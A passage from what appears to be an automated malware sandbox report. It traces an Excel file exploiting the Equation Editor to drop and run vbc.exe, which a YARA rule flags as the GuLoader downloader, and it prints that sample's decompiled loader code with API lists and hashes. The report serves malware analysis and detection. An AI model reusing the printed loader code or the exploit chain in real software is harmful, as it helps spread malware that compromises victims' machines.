      Aug 2, 2021 07:25:39.656429052 CEST15INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5a
      Data Ascii: ZR


      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: EXCEL.EXE PID: 1320 Parent PID: 584

      General

      Start time:07:24:41
      Start date:02/08/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13fc90000
      File size:27641504 bytes
      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: EQNEDT32.EXE PID: 2220 Parent PID: 584

      General

      Start time:07:25:03
      Start date:02/08/2021
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: vbc.exe PID: 2328 Parent PID: 2220

      General

      Start time:07:25:06
      Start date:02/08/2021
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\Public\vbc.exe'
      Imagebase:0x400000
      File size:259192 bytes
      MD5 hash:9318CD06A9A0B788DC043A63C97D4FCE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
      Reputation:low

      Chronological Activities

      Disassembly

      Code Analysis

      Reset < >

        Analysis Process: vbc.exe PID: 2328 Parent PID: 2220 vbc.exeCOMMON

        Executed Functions

        Function 00275798, Relevance: 20.3, APIs: 1, Strings: 10, Instructions: 1063memorynativeCOMMON
        Download Yara Rule
        APIs
        • NtAllocateVirtualMemory.NTDLL(-C11FD922), ref: 0027594C
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID: 7qKI$J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 2167126740-1855165314
        • Opcode ID: 77fdd16bc28cb0b8fdf8081dcadd2b4230c21fa3925e99c39555f48ee8f10892
        • Instruction ID: 083b1f51655c080ae54ff36bf6e6ca352b6b8b7eb9bf823e81854003846db164
        • Opcode Fuzzy Hash: 77fdd16bc28cb0b8fdf8081dcadd2b4230c21fa3925e99c39555f48ee8f10892
        • Instruction Fuzzy Hash: 3D8252B260034A9FEB349E78CD947DA77A2FF59350F94812EDC8D9B240D7748A85CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Function 004331B4, Relevance: 103.8, APIs: 41, Strings: 18, Instructions: 507COMMON
        Download Yara Rule
        C-Code - Quality: 52%
        			E004331B4(signed int _a4, intOrPtr _a682) {
				signed int _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v44;
				void* _v56;
				char _v60;
				char _v64;
				char _v88;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _v116;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				intOrPtr _v160;
				char _v168;
				intOrPtr _v176;
				char _v184;
				char _v200;
				char _v232;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				void* _t165;
				intOrPtr* _t166;
				void* _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t171;
				void* _t177;
				void* _t179;
				void* _t181;
				void* _t183;
				void* _t185;
				void* _t187;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t195;
				void* _t197;
				void* _t199;
				void* _t201;
				void* _t203;
				void* _t205;
				char _t206;
				void* _t212;
				signed int _t213;
				signed int _t214;
				char* _t241;
				char* _t259;
				void* _t282;
				char _t285;
				void* _t289;
				intOrPtr* _t290;
				intOrPtr* _t291;
				intOrPtr* _t292;
				intOrPtr* _t293;
				void* _t298;
				intOrPtr _t300;
				long long* _t301;
				void* _t302;
				void* _t305;

				 *[fs:0x0] = _t300;
				_t301 = _t300 - 0x12c;
				_v16 = _t301;
				_v12 = 0x401130;
				_t213 = _a4;
				_v8 = _t213 & 0x00000001;
				_t214 = _t213 & 0xfffffffe;
				_a4 = _t214;
				 *((intOrPtr*)( *_t214 + 4))(_t214, _t282, _t289, _t212,  *[fs:0x0], 0x401226);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t285 = 0;
				_t302 =  *0x435448 - _t285; // 0x24f6f4
				_v60 = 0;
				_v64 = 0;
				_v88 = 0;
				_v100 = 0;
				_v104 = 0;
				_v108 = 0;
				_v112 = 0;
				_v116 = 0;
				_v120 = 0;
				_v136 = 0;
				_v152 = 0;
				_v168 = 0;
				_v184 = 0;
				_v200 = 0;
				_v232 = 0;
				_v252 = 0;
				_v256 = 0;
				_v260 = 0;
				_v264 = 0;
				_v268 = 0;
				_v272 = 0;
				_v276 = 0;
				_v284 = 0;
				_v280 = 0;
				if(_t302 == 0) {
					_push(0x435448);
					_push(0x431ad4);
					L00401364();
				}
				_t290 =  *0x435448; // 0x24f6f4
				_t165 =  *((intOrPtr*)( *_t290 + 0x14))(_t290,  &_v116);
				asm("fclex");
				if(_t165 < _t285) {
					_push(0x14);
					_push(0x431ac4);
					_push(_t290);
					_push(_t165);
					L0040135E();
				}
				_t166 = _v116;
				_t291 = _t166;
				_t167 =  *((intOrPtr*)( *_t166 + 0x110))(_t166,  &_v108);
				asm("fclex");
				if(_t167 < _t285) {
					_push(0x110);
					_push(0x431ae4);
					_push(_t291);
					_push(_t167);
					L0040135E();
				}
				_v108 = _t285;
				L0040136A();
				L00401358();
				_t305 =  *0x435448 - _t285; // 0x24f6f4
				if(_t305 == 0) {
					_push(0x435448);
					_push(0x431ad4);
					L00401364();
				}
				_t292 =  *0x435448; // 0x24f6f4
				_t169 =  *((intOrPtr*)( *_t292 + 0x14))(_t292,  &_v116);
				asm("fclex");
				if(_t169 < _t285) {
					_push(0x14);
					_push(0x431ac4);
					_push(_t292);
					_push(_t169);
					L0040135E();
				}
				_t170 = _v116;
				_t293 = _t170;
				_t171 =  *((intOrPtr*)( *_t170 + 0x50))(_t170,  &_v108);
				asm("fclex");
				if(_t171 < _t285) {
					_push(0x50);
					_push(0x431ae4);
					_push(_t293);
					_push(_t171);
					L0040135E();
				}
				_push(_v108);
				_push(_t285);
				L00401352();
				asm("sbb esi, esi");
				L0040134C();
				L00401358();
				if( ~( ~_t171 + 1) != _t285) {
					_push(_t285);
					_push(L"Gennemfoerer7");
					_push( &_v136);
					L00401340();
					_t301 = _t301 - 0x10;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v100);
					asm("movsd");
					L00401346();
					L0040133A();
					_t285 = 0;
				}
				_v252 = 0x18e0;
				 *((intOrPtr*)( *_t214 + 0x718))(_t214,  &_v252, L"Manitou5");
				_v252 = 0x2f68;
				 *((intOrPtr*)( *_t214 + 0x718))(_t214,  &_v252, L"LUTES");
				L00401334();
				_t177 =  *((intOrPtr*)( *_t214 + 0x700))(_t214,  &_v108, 0x549086);
				if(_t177 >= _t285) {
					_t298 = 0x431650;
				} else {
					_push(0x700);
					_t298 = 0x431650;
					_push(0x431650);
					_push(_t214);
					_push(_t177);
					L0040135E();
				}
				L0040134C();
				_v272 = 0x4c51a4;
				_v268 = 0x4b3f310a;
				L00401334();
				_t69 =  &_v268; // 0x4b3f310a
				_t179 =  *((intOrPtr*)( *_t214 + 0x6f8))(_t214,  &_v108, _t69, 0x1a6e,  &_v272,  &_v276);
				if(_t179 < 0) {
					_push(0x6f8);
					_push(_t298);
					_push(_t214);
					_push(_t179);
					L0040135E();
				}
				L0040134C();
				_v260 = 0x20fb;
				_v256 = 0x22c0;
				_v252 = 0xad1;
				_t181 =  *((intOrPtr*)( *_t214 + 0x704))(_t214, 0x5fc0,  &_v252,  &_v256, 0x5e3c7650, 0x5af8,  &_v260,  &_v264);
				if(_t181 < 0) {
					_push(0x704);
					_push(_t298);
					_push(_t214);
					_push(_t181);
					L0040135E();
				}
				_t81 =  &_v268; // 0x4b3f310a
				_v252 = 0x7005;
				_t183 =  *((intOrPtr*)( *_t214 + 0x6fc))(_t214, 0x72750c,  &_v252, L"eskalere", _t81);
				if(_t183 < 0) {
					_push(0x6fc);
					_push(_t298);
					_push(_t214);
					_push(_t183);
					L0040135E();
				}
				_t85 =  &_v268; // 0x4b3f310a
				_t241 =  &_v252;
				_v252 = 0x1c28;
				_t185 =  *((intOrPtr*)( *_t214 + 0x6fc))(_t214, 0x21c7b1, _t241, L"Ombudsmandssags", _t85);
				if(_t185 < 0) {
					_push(0x6fc);
					_push(_t298);
					_push(_t214);
					_push(_t185);
					L0040135E();
				}
				 *_t301 =  *0x401128;
				_v284 = 0x98f265f0;
				_v280 = 0x5af5;
				_t187 =  *((intOrPtr*)( *_t214 + 0x710))(_t214, L"Foretagende",  &_v284, 0x38813, _t241, _t241);
				if(_t187 < 0) {
					_push(0x710);
					_push(_t298);
					_push(_t214);
					_push(_t187);
					L0040135E();
				}
				L00401334();
				_t189 =  *((intOrPtr*)( *_t214 + 0x700))(_t214,  &_v108, 0x102d81);
				if(_t189 < 0) {
					_push(0x700);
					_push(_t298);
					_push(_t214);
					_push(_t189);
					L0040135E();
				}
				L0040134C();
				_v260 = 0x1896;
				_v256 = 0x71bf;
				_v252 = 0x63df;
				_t191 =  *((intOrPtr*)( *_t214 + 0x704))(_t214, 0x6a8a,  &_v252,  &_v256, 0x694ff200, 0x5afe,  &_v260,  &_v264);
				if(_t191 < 0) {
					_push(0x704);
					_push(_t298);
					_push(_t214);
					_push(_t191);
					L0040135E();
				}
				L00401334();
				_t193 =  *((intOrPtr*)( *_t214 + 0x700))(_t214,  &_v108, 0x24b6b9);
				if(_t193 < 0) {
					_push(0x700);
					_push(_t298);
					_push(_t214);
					_push(_t193);
					L0040135E();
				}
				L0040134C();
				L00401334();
				_t195 =  *((intOrPtr*)( *_t214 + 0x700))(_t214,  &_v108, 0x6a9141);
				if(_t195 < 0) {
					_push(0x700);
					_push(_t298);
					_push(_t214);
					_push(_t195);
					L0040135E();
				}
				L0040134C();
				_t259 =  &_v252;
				_v260 = 0x3004;
				_v256 = 0x1b53;
				_v252 = 0x13cb;
				_t197 =  *((intOrPtr*)( *_t214 + 0x704))(_t214, 0x35f8, _t259,  &_v256, 0xcd9869a0, 0x5b02,  &_v260,  &_v264);
				if(_t197 < 0) {
					_push(0x704);
					_push(_t298);
					_push(_t214);
					_push(_t197);
					L0040135E();
				}
				 *_t301 =  *0x401120;
				_v284 = 0xbed390a0;
				_v280 = 0x5afa;
				_t199 =  *((intOrPtr*)( *_t214 + 0x710))(_t214, L"Decametre",  &_v284, 0x31010f, _t259, _t259);
				if(_t199 < 0) {
					_push(0x710);
					_push(_t298);
					_push(_t214);
					_push(_t199);
					L0040135E();
				}
				_v272 = 0x417ed2;
				_v268 = 0x4b821121;
				L00401334();
				_t201 =  *((intOrPtr*)( *_t214 + 0x6f8))(_t214,  &_v108,  &_v268, 0x3a32,  &_v272,  &_v276);
				if(_t201 < 0) {
					_push(0x6f8);
					_push(_t298);
					_push(_t214);
					_push(_t201);
					L0040135E();
				}
				L0040134C();
				_v252 = 0x5041;
				_t203 =  *((intOrPtr*)( *_t214 + 0x6fc))(_t214, 0x186c63,  &_v252, L"SIBNESS",  &_v268);
				if(_t203 < 0) {
					_push(0x6fc);
					_push(_t298);
					_push(_t214);
					_push(_t203);
					L0040135E();
				}
				_v252 = 0x6b03;
				_t205 =  *((intOrPtr*)( *_t214 + 0x6fc))(_t214, 0x840f3b,  &_v252, L"MASCHA",  &_v268);
				if(_t205 < 0) {
					_push(0x6fc);
					_push(_t298);
					_push(_t214);
					_push(_t205);
					L0040135E();
				}
				_t206 = 0xa;
				_v184 = _t206;
				_v168 = _t206;
				_v152 = _t206;
				_push( &_v184);
				_push( &_v168);
				_push( &_v152);
				_push(0);
				_push( &_v136);
				_v176 = 0x80020004;
				_v160 = 0x80020004;
				_v144 = 0x80020004;
				_v128 = 0xa776766;
				_a682 = 0x40df24;
				_a682 = _a682 - 0xfffe49fa;
				goto __edi;
			}











































































        0x004331c6
        0x004331cd
        0x004331d6
        0x004331d9
        0x004331e0
        0x004331e8
        0x004331eb
        0x004331f1
        0x004331f4
        0x004331fc
        0x004331fd
        0x004331fe
        0x004331ff
        0x00433205
        0x00433206
        0x00433208
        0x0043320e
        0x00433211
        0x00433214
        0x00433217
        0x0043321a
        0x0043321d
        0x00433220
        0x00433223
        0x00433226
        0x00433229
        0x0043322f
        0x00433235
        0x0043323b
        0x00433241
        0x00433247
        0x0043324d
        0x00433253
        0x00433259
        0x0043325f
        0x00433265
        0x0043326b
        0x00433271
        0x00433277
        0x0043327d
        0x00433283
        0x00433285
        0x0043328a
        0x0043328f
        0x0043328f
        0x00433294
        0x004332a1
        0x004332a4
        0x004332a8
        0x004332aa
        0x004332ac
        0x004332b1
        0x004332b2
        0x004332b3
        0x004332b3
        0x004332b8
        0x004332c2
        0x004332c4
        0x004332ca
        0x004332ce
        0x004332d0
        0x004332d5
        0x004332da
        0x004332db
        0x004332dc
        0x004332dc
        0x004332e7
        0x004332ea
        0x004332f2
        0x004332f7
        0x004332fd
        0x004332ff
        0x00433304
        0x00433309
        0x00433309
        0x0043330e
        0x0043331b
        0x0043331e
        0x00433322
        0x00433324
        0x00433326
        0x0043332b
        0x0043332c
        0x0043332d
        0x0043332d
        0x00433332
        0x0043333c
        0x0043333e
        0x00433341
        0x00433345
        0x00433347
        0x00433349
        0x0043334e
        0x0043334f
        0x00433350
        0x00433350
        0x00433355
        0x00433358
        0x00433359
        0x00433362
        0x0043336a
        0x00433372
        0x0043337a
        0x0043337c
        0x0043337d
        0x00433388
        0x00433389
        0x0043338e
        0x00433399
        0x0043339a
        0x0043339b
        0x0043339c
        0x0043339e
        0x004333a1
        0x004333a2
        0x004333ad
        0x004333b2
        0x004333b2
        0x004333c3
        0x004333cd
        0x004333e2
        0x004333ec
        0x004333fa
        0x0043340b
        0x00433418
        0x0043342a
        0x0043341a
        0x0043341a
        0x0043341b
        0x00433420
        0x00433421
        0x00433422
        0x00433423
        0x00433423
        0x00433432
        0x0043343f
        0x00433449
        0x00433453
        0x0043346d
        0x00433479
        0x00433481
        0x00433483
        0x00433488
        0x00433489
        0x0043348a
        0x0043348b
        0x0043348b
        0x00433493
        0x004334c6
        0x004334d0
        0x004334da
        0x004334e4
        0x004334ec
        0x004334ee
        0x004334f3
        0x004334f4
        0x004334f5
        0x004334f6
        0x004334f6
        0x004334fd
        0x00433516
        0x00433520
        0x00433528
        0x0043352a
        0x0043352f
        0x00433530
        0x00433531
        0x00433532
        0x00433532
        0x00433539
        0x00433545
        0x00433552
        0x0043355c
        0x00433564
        0x00433566
        0x0043356b
        0x0043356c
        0x0043356d
        0x0043356e
        0x0043356e
        0x0043357d
        0x00433592
        0x0043359c
        0x004335a6
        0x004335ae
        0x004335b0
        0x004335b5
        0x004335b6
        0x004335b7
        0x004335b8
        0x004335b8
        0x004335c5
        0x004335d6
        0x004335de
        0x004335e0
        0x004335e1
        0x004335e2
        0x004335e3
        0x004335e4
        0x004335e4
        0x004335ec
        0x0043361f
        0x00433629
        0x00433633
        0x0043363d
        0x00433645
        0x00433647
        0x0043364c
        0x0043364d
        0x0043364e
        0x0043364f
        0x0043364f
        0x0043365c
        0x0043366d
        0x00433675
        0x00433677
        0x00433678
        0x00433679
        0x0043367a
        0x0043367b
        0x0043367b
        0x00433683
        0x00433690
        0x004336a1
        0x004336a9
        0x004336ab
        0x004336ac
        0x004336ad
        0x004336ae
        0x004336af
        0x004336af
        0x004336b7
        0x004336dd
        0x004336ea
        0x004336f4
        0x004336fe
        0x00433708
        0x00433710
        0x00433712
        0x00433717
        0x00433718
        0x00433719
        0x0043371a
        0x0043371a
        0x00433729
        0x0043373e
        0x00433748
        0x00433752
        0x0043375a
        0x0043375c
        0x00433761
        0x00433762
        0x00433763
        0x00433764
        0x00433764
        0x00433771
        0x0043377b
        0x00433785
        0x004337ab
        0x004337b3
        0x004337b5
        0x004337ba
        0x004337bb
        0x004337bc
        0x004337bd
        0x004337bd
        0x004337c5
        0x004337e5
        0x004337ef
        0x004337f7
        0x004337f9
        0x004337fe
        0x004337ff
        0x00433800
        0x00433801
        0x00433801
        0x00433821
        0x0043382b
        0x00433833
        0x00433835
        0x0043383a
        0x0043383b
        0x0043383c
        0x0043383d
        0x0043383d
        0x00433844
        0x00433845
        0x0043384b
        0x00433851
        0x0043385d
        0x00433864
        0x0043386b
        0x00433871
        0x00433879
        0x0043387a
        0x00433880
        0x00433886
        0x0043388c
        0x00433893
        0x0043389d
        0x004338ad

        APIs
        • __vbaNew2.MSVBVM60(00431AD4,00435448), ref: 0043328F
        • __vbaHresultCheckObj.MSVBVM60(00000000,0024F6F4,00431AC4,00000014), ref: 004332B3
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00431AE4,00000110), ref: 004332DC
        • __vbaStrMove.MSVBVM60(00000000,?,00431AE4,00000110), ref: 004332EA
        • __vbaFreeObj.MSVBVM60(00000000,?,00431AE4,00000110), ref: 004332F2
        • __vbaNew2.MSVBVM60(00431AD4,00435448), ref: 00433309
        • __vbaHresultCheckObj.MSVBVM60(00000000,0024F6F4,00431AC4,00000014), ref: 0043332D
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00431AE4,00000050), ref: 00433350
        • __vbaStrCmp.MSVBVM60(00000000,?), ref: 00433359
        • __vbaFreeStr.MSVBVM60(00000000,?), ref: 0043336A
        • __vbaFreeObj.MSVBVM60(00000000,?), ref: 00433372
        • #716.MSVBVM60(?,Gennemfoerer7,00000000,00000000,?), ref: 00433389
        • __vbaLateIdSt.MSVBVM60(?,00000000,?), ref: 004333A2
        • __vbaFreeVar.MSVBVM60(?,00000000,?), ref: 004333AD
        • __vbaStrCopy.MSVBVM60 ref: 004333FA
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433423
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433432
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433453
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006F8), ref: 0043348B
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,000006F8), ref: 00433493
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000704), ref: 004334F6
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006FC), ref: 00433532
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006FC), ref: 0043356E
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000710), ref: 004335B8
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000710), ref: 004335C5
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000700), ref: 004335E4
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,00000700), ref: 004335EC
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000704), ref: 0043364F
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000704), ref: 0043365C
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000700), ref: 0043367B
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433683
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000700), ref: 00433690
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000700), ref: 004336AF
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,00000700), ref: 004336B7
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000704), ref: 0043371A
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,00000710), ref: 00433764
        • __vbaStrCopy.MSVBVM60(00000000,00401130,00431650,00000710), ref: 00433785
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006F8), ref: 004337BD
        • __vbaFreeStr.MSVBVM60(00000000,00401130,00431650,000006F8), ref: 004337C5
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006FC), ref: 00433801
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00431650,000006FC), ref: 0043383D
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$CheckHresult$Free$Copy$New2$#716LateMove
        • String ID: 1?K$AP$Baghaven$Decametre$Foretagende$Gennemfoerer7$LUTES$MASCHA$Manitou5$Ombudsmandssags$Racquets6$SIBNESS$Undertip8$dovneste$eskalere$fgw$forktrelser$spermaceti
        • API String ID: 3859083423-3706718144
        • Opcode ID: f5e45a99b951f2a1d1be3cf14854c28194beabfd59fc8e0f6390fd9e00acbb44
        • Instruction ID: 0cb2dea461580c366750edc0f6d7fd51c3546b181de6eaf3d35cf75ba8531b1f
        • Opcode Fuzzy Hash: f5e45a99b951f2a1d1be3cf14854c28194beabfd59fc8e0f6390fd9e00acbb44
        • Instruction Fuzzy Hash: D61241B0940219AFEB24DF55CC89FEEB7B8EF14704F0041AAF509A7191DBB85A84CF64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00401388, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 224COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: #100
        • String ID: VB5!6%*
        • API String ID: 1341478452-4246263594
        • Opcode ID: 5f024488ff9672cb9e96c30a68833fbea30e7569b078e3e64589e2d633f80c4b
        • Instruction ID: 9a1096f8a0c9cb9102b560f3722554ea82e1537a9b8d88e42daa921e95f26e6d
        • Opcode Fuzzy Hash: 5f024488ff9672cb9e96c30a68833fbea30e7569b078e3e64589e2d633f80c4b
        • Instruction Fuzzy Hash: 4F8162A644E3C15FD7438BB899656917FB1AE23218B0F45DBC4C1CF0B3E2A9590AD732
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 0027245F, Relevance: 12.3, Strings: 9, Instructions: 1067COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 0-1906473922
        • Opcode ID: f3422d547e73e0428b29bec84574c8e7f20aad939db443c795b9e2ac30fe8f27
        • Instruction ID: 838444554606acd522f16eb2ca87980d139af54e7e39e2dbbbd239d57aa5e8c6
        • Opcode Fuzzy Hash: f3422d547e73e0428b29bec84574c8e7f20aad939db443c795b9e2ac30fe8f27
        • Instruction Fuzzy Hash: 628266B160034ADFDB308E78CD957DA77A2FF59350F95812ADC8D9B204D3349A86CB52
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00273BB6, Relevance: 12.3, Strings: 9, Instructions: 1004COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 0-1906473922
        • Opcode ID: eb45a0b08d16ef1c91ac2c6df60950d908e2c2ebaf47a2a45241a12c685392a7
        • Instruction ID: f12a038c5e05294ca5dbacdcef8ee16910cb536923a198594ba0ddab2d9fffa0
        • Opcode Fuzzy Hash: eb45a0b08d16ef1c91ac2c6df60950d908e2c2ebaf47a2a45241a12c685392a7
        • Instruction Fuzzy Hash: CF82547160434A9FDB348E78CD947DA77A2FF1A350F94822EDC8D9B245D3348A86CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002773CC, Relevance: 12.2, Strings: 9, Instructions: 976COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 0-1906473922
        • Opcode ID: a4437abaa23efece04aeae2b1f1dc64b4502cc4bf0e44b924140cfa53641fc78
        • Instruction ID: 1876e0954309e929bcf825a5dc6e3d63d81fe36791bf79377ec9b40f95bcd21c
        • Opcode Fuzzy Hash: a4437abaa23efece04aeae2b1f1dc64b4502cc4bf0e44b924140cfa53641fc78
        • Instruction Fuzzy Hash: 638254B260034A9FDB309F78CD947DA77A2FF5A350F94812ADC899B200D3749A85CB52
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00274050, Relevance: 12.2, Strings: 9, Instructions: 926COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$_K$d@0!$n?SK$*G$JK
        • API String ID: 0-1906473922
        • Opcode ID: 87652bb9e89fd4485b5cc158590c36ec90b3e049c01afc01b3dc547cb688b3bb
        • Instruction ID: ecb0573b3d5c6a3095cd5381b759f5d31fe78273a8085fbf1821fcfd4fad745a
        • Opcode Fuzzy Hash: 87652bb9e89fd4485b5cc158590c36ec90b3e049c01afc01b3dc547cb688b3bb
        • Instruction Fuzzy Hash: C07264B260034ADFDB309F78CD957DA77A2FF1A350F95812ADC899B204D3749A85CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0027433C, Relevance: 8.3, Strings: 6, Instructions: 764COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$^Zi$*G$JK
        • API String ID: 0-574496016
        • Opcode ID: d6b62564e5c9319851b4dda84e16d7188db732fdc288302ecbf4b883eb6cbe41
        • Instruction ID: 93fce57343b329e3f42ef4b0746840265feecd96130bacce682d5b749feb65bf
        • Opcode Fuzzy Hash: d6b62564e5c9319851b4dda84e16d7188db732fdc288302ecbf4b883eb6cbe41
        • Instruction Fuzzy Hash: 915223B260034ADFDB309F78CD957DA77A2FF19350F84812ADC899B200D3749A86CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002746B8, Relevance: 5.6, Strings: 4, Instructions: 555COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$*G
        • API String ID: 0-214948836
        • Opcode ID: fd26406aa42d1f086059706d7c501c911bd859b0cf9ff87819124bfb3beadae7
        • Instruction ID: 53f9f29a7a0f066f8c8cce1ce2dcc57e77e755f12274abd416380f5eb8e3ce27
        • Opcode Fuzzy Hash: fd26406aa42d1f086059706d7c501c911bd859b0cf9ff87819124bfb3beadae7
        • Instruction Fuzzy Hash: 0A121272611349DFEF309E78CDA57DA37A2FF1A350F95812ADC8D9B200D3748A868B51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0027489B, Relevance: 5.5, Strings: 4, Instructions: 454COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$*G
        • API String ID: 0-214948836
        • Opcode ID: 4857aba5639b5b0bfe865bb4209fc0ffa2b9daea1229c6df02f92f1c275af324
        • Instruction ID: 51e6eb735ee2bcb8aa34c2cd61f7195783ef58319a8add70ad8f7b6e48a010d5
        • Opcode Fuzzy Hash: 4857aba5639b5b0bfe865bb4209fc0ffa2b9daea1229c6df02f92f1c275af324
